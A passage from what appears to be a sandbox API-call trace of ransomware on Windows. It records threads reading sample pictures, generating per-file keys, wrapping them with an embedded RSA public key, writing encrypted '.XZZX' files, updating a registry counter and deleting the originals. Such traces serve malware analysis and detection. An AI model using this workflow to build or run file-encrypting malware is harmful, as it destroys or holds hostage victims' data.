lpOverlapped=0x0 | out: lpBuffer=0x4379d00*, lpNumberOfBytesWritten=0x48fe438*=0x80, lpOverlapped=0x0) returned 1 [0144.408] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0144.408] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x48fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x48fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.408] GetUserNameW (in: lpBuffer=0x48fe1f8, pcbBuffer=0x48fdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x48fdfe0) returned 1 [0144.409] wsprintfW (in: param_1=0x48fdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0144.409] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x48fdfe4 | out: phkResult=0x48fdfe4*=0x890) returned 0x0 [0144.409] RegQueryValueExW (in: hKey=0x890, lpValueName="E1010314", lpReserved=0x0, lpType=0x48fdfd8, lpData=0x48fdfec, lpcbData=0x48fdfdc*=0x4 | out: lpType=0x48fdfd8*=0x4, lpData=0x48fdfec*=0xd0, lpcbData=0x48fdfdc*=0x4) returned 0x0 [0144.409] RegCloseKey (hKey=0x890) returned 0x0 [0144.409] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x48fdfe8 | out: phkResult=0x48fdfe8*=0x890) returned 0x0 [0144.409] RegSetValueExW (in: hKey=0x890, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x48fdfec*=0xd1, cbData=0x4 | out: lpData=0x48fdfec*=0xd1) returned 0x0 [0144.409] RegCloseKey (hKey=0x890) returned 0x0 [0144.409] VirtualFree (lpAddress=0x3350000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.409] VirtualFree (lpAddress=0x40a0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.410] CloseHandle (hObject=0x894) returned 1 [0144.411] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0144.412] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0144.412] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini")) returned 1 [0144.413] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\desktop.ini" (normalized: "c:\\users\\public\\pictures\\sample pictures\\desktop.ini")) returned 0 Thread: id = 515 os_tid = 0xb6c [0144.283] lstrcpyA (in: lpString1=0x49ffc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.283] lstrcpyW (in: lpString1=0x49ff460, lpString2="Hydrangeas.jpg" | out: lpString1="Hydrangeas.jpg") returned="Hydrangeas.jpg" [0144.283] lstrcpyW (in: lpString1=0x49fe860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.283] SetErrorMode (uMode=0x1) returned 0x1 [0144.283] lstrcpyW (in: lpString1=0x49ff860, lpString2="Hydrangeas.jpg" | out: lpString1="Hydrangeas.jpg") returned="Hydrangeas.jpg" [0144.283] CoCreateGuid (in: pguid=0x49fe440 | out: pguid=0x49fe440*(Data1=0x90255077, Data2=0xd01d, Data3=0x4887, Data4=([0]=0x87, [1]=0x21, [2]=0x6f, [3]=0xe3, [4]=0x10, [5]=0xea, [6]=0x7, [7]=0x9f))) returned 0x0 [0144.283] wsprintfW (in: param_1=0x49fec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg") returned 59 [0144.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x49ffee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0144.283] wsprintfW (in: param_1=0x49fe450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\A59ACD7B3AF5E74B902550773F95CB93.XZZX") returned 82 [0144.283] StrStrW (lpFirst="Hydrangeas.jpg", lpSrch="XZZX") returned 0x0 [0144.284] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg", dwFileAttributes=0x20) returned 1 [0144.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0144.284] ReadFile (in: hFile=0x894, lpBuffer=0x4110020, nNumberOfBytesToRead=0x91554, lpNumberOfBytesRead=0x49fe418, lpOverlapped=0x0 | out: lpBuffer=0x4110020*, lpNumberOfBytesRead=0x49fe418*=0x91554, lpOverlapped=0x0) returned 1 [0144.290] CloseHandle (hObject=0x894) returned 1 [0144.291] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x40b0000 [0144.291] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40c0000 [0144.291] SetErrorMode (uMode=0x1) returned 0x1 [0144.291] lstrcpyW (in: lpString1=0x49fe358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0144.291] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379bf0) returned 1 [0144.295] CryptGenKey (in: hProv=0x4379bf0, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11bd8) returned 1 [0144.493] CryptExportKey (in: hKey=0x3d11bd8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x49fe41c | out: pbData=0x0*, pdwDataLen=0x49fe41c*=0x94) returned 1 [0144.493] CryptExportKey (in: hKey=0x3d11bd8, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40c0000, pdwDataLen=0x49fe41c | out: pbData=0x40c0000*, pdwDataLen=0x49fe41c*=0x94) returned 1 [0144.493] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.493] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0144.493] CryptDestroyKey (hKey=0x3d11bd8) returned 1 [0144.493] CryptReleaseContext (hProv=0x4379bf0, dwFlags=0x0) returned 0 [0144.496] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\A59ACD7B3AF5E74B902550773F95CB93.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\a59acd7b3af5e74b902550773f95cb93.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8d4 [0144.496] WriteFile (in: hFile=0x8d4, lpBuffer=0x4110020*, nNumberOfBytesToWrite=0x91554, lpNumberOfBytesWritten=0x49fe438, lpOverlapped=0x0 | out: lpBuffer=0x4110020*, lpNumberOfBytesWritten=0x49fe438*=0x91554, lpOverlapped=0x0) returned 1 [0144.504] SetFilePointer (in: hFile=0x8d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91554 [0144.504] WriteFile (in: hFile=0x8d4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.504] SetFilePointer (in: hFile=0x8d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91559 [0144.505] WriteFile (in: hFile=0x8d4, lpBuffer=0x49ff860*, nNumberOfBytesToWrite=0x1c, lpNumberOfBytesWritten=0x49fe438, lpOverlapped=0x0 | out: lpBuffer=0x49ff860*, lpNumberOfBytesWritten=0x49fe438*=0x1c, lpOverlapped=0x0) returned 1 [0144.505] SetFilePointer (in: hFile=0x8d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x91575 [0144.505] WriteFile (in: hFile=0x8d4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.505] SetFilePointer (in: hFile=0x8d4, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0x9157a [0144.505] SetErrorMode (uMode=0x1) returned 0x1 [0144.505] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0144.505] OutputDebugStringW (lpOutputString="end") [0144.505] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ\x9f\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x49fdbf4, pcbBinary=0x49fd3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x49fdbf4, pcbBinary=0x49fd3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.505] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x49fdbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x49fd3dc, pcbStructInfo=0x49fd3d8 | out: pvStructInfo=0x49fd3dc, pcbStructInfo=0x49fd3d8) returned 1 [0144.505] CryptAcquireContextW (in: phProv=0x49fd3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x49fd3e4*=0x4379d88) returned 1 [0144.506] CryptImportPublicKeyInfo (in: hCryptProv=0x4379d88, dwCertEncodingType=0x1, pInfo=0x3cf2b00*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2b30*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2b38*, PublicKey.cUnusedBits=0x0), phKey=0x49fd3ec | out: phKey=0x49fd3ec*=0x3d11bd8) returned 1 [0144.506] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.506] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0144.506] CryptEncrypt (in: hKey=0x3d11bd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x49fd3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x49fd3f0*=0x80) returned 1 [0144.506] CryptEncrypt (in: hKey=0x3d11bd8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x4379e10*, pdwDataLen=0x49fd3e8*=0x75, dwBufLen=0x80 | out: pbData=0x4379e10*, pdwDataLen=0x49fd3e8*=0x80) returned 1 [0144.506] WriteFile (in: hFile=0x8d4, lpBuffer=0x4379e10*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x49fe438, lpOverlapped=0x0 | out: lpBuffer=0x4379e10*, lpNumberOfBytesWritten=0x49fe438*=0x80, lpOverlapped=0x0) returned 1 [0144.506] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0144.506] WriteFile (in: hFile=0x8d4, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x49fe438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x49fe438*=0x5, lpOverlapped=0x0) returned 1 [0144.506] GetUserNameW (in: lpBuffer=0x49fe1f8, pcbBuffer=0x49fdfe0 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0x49fdfe0) returned 1 [0144.507] wsprintfW (in: param_1=0x49fdff0, param_2="%08X" | out: param_1="E1010314") returned 8 [0144.507] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x49fdfe4 | out: phkResult=0x49fdfe4*=0x894) returned 0x0 [0144.507] RegQueryValueExW (in: hKey=0x894, lpValueName="E1010314", lpReserved=0x0, lpType=0x49fdfd8, lpData=0x49fdfec, lpcbData=0x49fdfdc*=0x4 | out: lpType=0x49fdfd8*=0x4, lpData=0x49fdfec*=0xd1, lpcbData=0x49fdfdc*=0x4) returned 0x0 [0144.507] RegCloseKey (hKey=0x894) returned 0x0 [0144.507] RegCreateKeyW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion", phkResult=0x49fdfe8 | out: phkResult=0x49fdfe8*=0x894) returned 0x0 [0144.507] RegSetValueExW (in: hKey=0x894, lpValueName="E1010314", Reserved=0x0, dwType=0x4, lpData=0x49fdfec*=0xd2, cbData=0x4 | out: lpData=0x49fdfec*=0xd2) returned 0x0 [0144.507] RegCloseKey (hKey=0x894) returned 0x0 [0144.507] VirtualFree (lpAddress=0x40b0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.507] VirtualFree (lpAddress=0x40c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0144.507] CloseHandle (hObject=0x8d4) returned 1 [0144.514] LoadLibraryExW (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75ce0000 [0144.515] GetProcAddress (hModule=0x75ce0000, lpProcName="DeleteFileW") returned 0x75cf89b3 [0144.515] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg")) returned 1 [0144.519] DeleteFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Hydrangeas.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\hydrangeas.jpg")) returned 0 Thread: id = 516 os_tid = 0xb70 [0144.463] lstrcpyA (in: lpString1=0x42efc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0144.463] lstrcpyW (in: lpString1=0x42ef460, lpString2="Jellyfish.jpg" | out: lpString1="Jellyfish.jpg") returned="Jellyfish.jpg" [0144.463] lstrcpyW (in: lpString1=0x42ee860, lpString2="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" | out: lpString1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\") returned="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\" [0144.463] SetErrorMode (uMode=0x1) returned 0x1 [0144.463] lstrcpyW (in: lpString1=0x42ef860, lpString2="Jellyfish.jpg" | out: lpString1="Jellyfish.jpg") returned="Jellyfish.jpg" [0144.463] CoCreateGuid (in: pguid=0x42ee440 | out: pguid=0x42ee440*(Data1=0xb1c0f8be, Data2=0x350d, Data3=0x48f8, Data4=([0]=0xb8, [1]=0xc6, [2]=0xf1, [3]=0x88, [4]=0x42, [5]=0x46, [6]=0xc, [7]=0x1a))) returned 0x0 [0144.463] wsprintfW (in: param_1=0x42eec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg") returned 58 [0144.463] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x42efee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0144.463] wsprintfW (in: param_1=0x42ee450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX") returned 82 [0144.463] StrStrW (lpFirst="Jellyfish.jpg", lpSrch="XZZX") returned 0x0 [0144.463] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg", dwFileAttributes=0x20) returned 1 [0144.522] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\Jellyfish.jpg" (normalized: "c:\\users\\public\\pictures\\sample pictures\\jellyfish.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x8c4 [0144.522] ReadFile (in: hFile=0x8c4, lpBuffer=0x4560020, nNumberOfBytesToRead=0xbd616, lpNumberOfBytesRead=0x42ee418, lpOverlapped=0x0 | out: lpBuffer=0x4560020*, lpNumberOfBytesRead=0x42ee418*=0xbd616, lpOverlapped=0x0) returned 1 [0144.532] CloseHandle (hObject=0x8c4) returned 1 [0144.532] VirtualAlloc (lpAddress=0x0, dwSize=0x75, flAllocationType=0x3000, flProtect=0x4) returned 0x3350000 [0144.533] VirtualAlloc (lpAddress=0x0, dwSize=0x12c, flAllocationType=0x3000, flProtect=0x4) returned 0x40a0000 [0144.533] SetErrorMode (uMode=0x1) returned 0x1 [0144.533] lstrcpyW (in: lpString1=0x42ee358, lpString2="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" | out: lpString1="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre") returned="Zvpebfbsg Raunaprq EFN naq NRF Pelcgbtencuvp Cebivqre" [0144.533] CryptAcquireContextW (in: phProv=0x5582af24, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0x0 | out: phProv=0x5582af24*=0x4379e98) returned 1 [0144.536] CryptGenKey (in: hProv=0x4379e98, Algid=0x1, dwFlags=0x4000, phKey=0x5582af28 | out: phKey=0x5582af28*=0x3d11c58) returned 1 [0144.706] CryptExportKey (in: hKey=0x3d11c58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x0, pdwDataLen=0x42ee41c | out: pbData=0x0*, pdwDataLen=0x42ee41c*=0x94) returned 1 [0144.706] CryptExportKey (in: hKey=0x3d11c58, hExpKey=0x0, dwBlobType=0x6, dwFlags=0x0, pbData=0x40a0000, pdwDataLen=0x42ee41c | out: pbData=0x40a0000*, pdwDataLen=0x42ee41c*=0x94) returned 1 [0144.706] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.706] GetProcAddress (hModule=0x75960000, lpProcName="CryptReleaseContext") returned 0x7596e124 [0144.706] CryptDestroyKey (hKey=0x3d11c58) returned 1 [0144.706] CryptReleaseContext (hProv=0x4379f20, dwFlags=0x0) returned 0 [0144.710] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Public\\Pictures\\Sample Pictures\\FA4BF7A60F1F0C98B1C0F8BE134DF0E0.XZZX" (normalized: "c:\\users\\public\\pictures\\sample pictures\\fa4bf7a60f1f0c98b1c0f8be134df0e0.xzzx"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x894 [0144.710] WriteFile (in: hFile=0x894, lpBuffer=0x4560020*, nNumberOfBytesToWrite=0xbd616, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x4560020*, lpNumberOfBytesWritten=0x42ee438*=0xbd616, lpOverlapped=0x0) returned 1 [0144.720] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd616 [0144.720] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ee438*=0x5, lpOverlapped=0x0) returned 1 [0144.720] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd61b [0144.720] WriteFile (in: hFile=0x894, lpBuffer=0x42ef860*, nNumberOfBytesToWrite=0x1a, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x42ef860*, lpNumberOfBytesWritten=0x42ee438*=0x1a, lpOverlapped=0x0) returned 1 [0144.720] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd635 [0144.720] WriteFile (in: hFile=0x894, lpBuffer=0x558263d0*, nNumberOfBytesToWrite=0x5, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x558263d0*, lpNumberOfBytesWritten=0x42ee438*=0x5, lpOverlapped=0x0) returned 1 [0144.720] SetFilePointer (in: hFile=0x894, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xbd63a [0144.721] SetErrorMode (uMode=0x1) returned 0x1 [0144.721] lstrlenA (lpString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned 271 [0144.721] OutputDebugStringW (lpOutputString="end") [0144.721] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----v\x08\x86Ê\x03`Õ.\x04â", cchString=0x0, dwFlags=0x0, pbBinary=0x42edbf4, pcbBinary=0x42ed3e0, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x42edbf4, pcbBinary=0x42ed3e0, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0144.721] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x42edbf4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x42ed3dc, pcbStructInfo=0x42ed3d8 | out: pvStructInfo=0x42ed3dc, pcbStructInfo=0x42ed3d8) returned 1 [0144.721] CryptAcquireContextW (in: phProv=0x42ed3e4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x42ed3e4*=0x4379fa8) returned 1 [0144.722] CryptImportPublicKeyInfo (in: hCryptProv=0x4379fa8, dwCertEncodingType=0x1, pInfo=0x3cf2d70*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x3cf2da0*, PublicKey.cbData=0x8c, PublicKey.pbData=0x3cf2da8*, PublicKey.cUnusedBits=0x0), phKey=0x42ed3ec | out: phKey=0x42ed3ec*=0x3d11c58) returned 1 [0144.722] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x75960000 [0144.723] GetProcAddress (hModule=0x75960000, lpProcName="CryptEncrypt") returned 0x7598779b [0144.723] CryptEncrypt (in: hKey=0x3d11c58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x42ed3f0*=0x75, dwBufLen=0x75 | out: pbData=0x0*, pdwDataLen=0x42ed3f0*=0x80) returned 1 [0144.723] CryptEncrypt (in: hKey=0x3d11c58, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x437a030*, pdwDataLen=0x42ed3e8*=0x75, dwBufLen=0x80 | out: pbData=0x437a030*, pdwDataLen=0x42ed3e8*=0x80) returned 1 [0144.723] WriteFile (in: hFile=0x894, lpBuffer=0x437a030*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x42ee438, lpOverlapped=0x0 | out: lpBuffer=0x437a030*, lpNumberOfBytesWritten=0x42ee438*=0x80, lpOverlapped=0x0) returned 1 [0144.723] SetFilePointer (in: hFile=0x75cf1282, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x0) returned 0xffffffff [0144.723] WriteFile (in: 